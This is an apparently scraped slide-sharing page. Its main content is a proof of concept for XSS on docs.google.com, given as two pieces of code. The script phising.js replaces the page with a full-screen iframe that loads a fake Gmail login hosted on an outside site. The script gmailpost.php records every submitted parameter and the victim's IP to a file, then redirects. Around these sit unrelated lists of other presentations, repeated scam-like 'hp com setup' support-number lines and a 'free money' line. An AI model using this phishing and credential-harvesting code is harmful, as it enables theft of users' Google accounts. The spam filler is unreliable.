XSS POC en docs.google.com ::phising.js:: document.body.innerHTML = ''; var igoogle = document.createElement('iframe'); igoogle.src = 'http://www.sinfocol.org/archivos/2009/11/gmail.htm';

Slides:

Advertisements

Similar presentations

THE SCO GROUP Welcome to Using MySQL. 2 ZENEZ ZENEZ Website MySQL on ZENEZ

Advertisements

Building Fast 3rd-Party Webapps O'Reilly Velocity Web Performance and Operations Conference 24 June Lessons.

Steve Souders Even Faster Websites Disclaimer: This content does not necessarily reflect.

17% 83% iGoogle, primed cache the importance of frontend performance 9%91% iGoogle, empty cache.

Steve Souders Even Faster Web Sites best practices for faster pages Disclaimer: This.

Steve Souders Even Faster Web Sites (inside ma.tt) best practices for faster pages.

Steve Souders Life's too short, write fast code part 1 Disclaimer: This content does.

Steve Souders Even Faster Web Sites best practices for faster pages Disclaimer:

17% 83% iGoogle, primed cache the importance of frontend performance 9%91% iGoogle, empty cache.

Steve Souders Even Faster Web Sites Disclaimer: This content does not necessarily reflect.

CS193H: High Performance Web Sites Lecture 15: Rule 12 – Remove Duplicate Scripts Steve Souders Google

Steve Souders Even Faster Web Sites best practices for faster pages Disclaimer: This content does not necessarily.

Steve Souders Life's too short, write fast code part 1 Disclaimer: This content does.

CS193H: High Performance Web Sites Lecture 20: Vol 2 – Don't Scatter Inline Scripts Steve Souders Google

Steve Souders Even Faster Web Sites best practices for faster pages Disclaimer: This content does not necessarily.

CS193H: High Performance Web Sites Lecture 12: Rule 8 – Make JavaScript and CSS External Steve Souders Google

CS193H: High Performance Web Sites Lecture 19: Vol 2 – Load Scripts Without Blocking Steve Souders Google

CS193H: High Performance Web Sites Lecture 10: Rule 6 – Put Scripts at the Bottom Steve Souders Google

CSS3 OVERVIEW Owen Williams Owen at dynabooks daht com.

Web - Facebook A. Ferrari. Punto di partenza ns/like

By Loukik Purohit & Rohit Ghatol

By: Josh and Jordyn Red Wolfs. Red wolfs facts The diet for red wolf is rabbit and rats. U.S. fish and wildlife service help with the red wolf recovery.

1 Programming the Web: HTML Basics Computing Capilano College.

SOWK 300 Sp 11 Pamela Delaine What have I learned… How to use SPSS Make a survey How to use chart and tables correctly How to make a professional report.

Intro What Else?RecapEnter Flash Hybrid FilesEnter Java Will it Blend?Background.

Raoul Wallenberg. Who? August 4, 1912 ~ July 17, 1947 Swedish humanitarian Studied drawing and architecture Graduated from U of Michigan Became Swedish.

The Circulatory System By: Chloe. What Is It? ▪The circulatory system is around your heart. ▪The blood vessels begin at your heart go through your body.

DOM Based XSS and Proper Output Encoding By Abraham Kang Principal Security Researcher HP Fortify.

HTML5 Media API.

IE 9Google .mp4.ogv.webm Width Height Src Poster Loop Autoplay Mute Preload controls.

getElementById() document.getElementById(“idName").innerHTML = “Any valid content"; getElementById is a method innerHTML is a property.

 Review ◦ DMACC  P drive ◦ password: stem2014 first line  always put your  Club Web site :

A really fairly simple guide to: mobile browser-based application development (part 1) Chris Greenhalgh G54UBI / Chris Greenhalgh

GeoRSS and Webmaps. Really Simple Syndication Specification name of the FEED creator's name 2011 unique item can.

Responsive and Adaptive Web Design By: Chad W. Stoker (MCTS, MCP, MCAD) President & Chief Technology Officer.

Document Object Model (DOM) JavaScript manipulation of the DOM.

JQuery & SharePoint San Antonio Users Group – September Meeting September 22, 2009 Microsoft SharePoint Server.

Day 2 – JavaScript & PHP.  Have the hover effect display an extra image  Add an extra image for each of the tags  In your writeText() function, you.

Additional Topics. Tutorial #9 Review – Forms Forms Legend and fieldset Fields Text Password Radio buttons, check box, text area, select lists Buttons.

Office On The Go Russell Tritico Region 5 ESC. Cloud What is a cloud? Why is it good?

Adding maps, widgets, searchbox Week 07 TCNJ Web 2 Jean Chu.

HTML (Hyper Text Markup Language) Lecture II. Review Writing HTML files for web pages – efficient compact – fundamental. Text files with htm extension.

Web Technologies Lecture 7 Synchronous vs. asynchronous.

Drop-down box. Objectives Learn the HTML syntax of a drop-down list javascript properties of a list/menu: length options selectedIndex The location sub-object.

Get Help-Gmail help number

www 123 hp com setup hp com setup :

www 123 hp com setup 8710 Call Here:

www 123 hp com setup 4650 Printer Support Call:

www hp com setup Printer Support Call:

www 123 hp com setup hp com setup :

www 123 hp com setup 8710 Call Here:

www 123 hp com setup 4650 Printer Support Call:

www hp com setup Printer Support Call:

www 123 hp com setup hp com setup :

www 123 hp com setup 8710 Call Here:

www 123 hp com setup 4650 Printer Support Call:

www hp com setup Printer Support Call:

www hp com setup Printer Support Call:

www 123 hp com setup hp com setup :

www 123 hp com setup 4650 Printer Support Call:

Www hp com setup Printer Support Call:

www 123 hp com setup hp com setup :

www 123 hp com setup 4650 Printer Support Call:

www 123 hp com setup 8710 Call Here:

iGoogle and Google Docs

laboutiquedelpowerpoint.

Presentation transcript:

XSS POC en docs.google.com ::phising.js:: document.body.innerHTML = ''; var igoogle = document.createElement('iframe'); igoogle.src = ' igoogle.style.width = '100%'; igoogle.style.height = '100%'; igoogle.style.border = '0'; void(document.body.appendChild(igoogle));

XSS POC en docs.google.com ::gmailpost.php:: <?php $filename = 'gmail.txt'; if (count($_GET) == 0) die; $str = " \n"; $str.= "Date: ". date('d/m/Y - h:i:s a', time()). "\n"; $str.= "IP: ". $_SERVER['REMOTE_ADDR']. "\n"; $str.= " \n"; foreach ($_GET as $indice => $valor) { $str.= "$indice => $valor\n"; } $file = fopen($filename, 'a'); fwrite($file, $str); fclose($file); header('Location:

GANE DINERO GRATIS FREE MONEY $$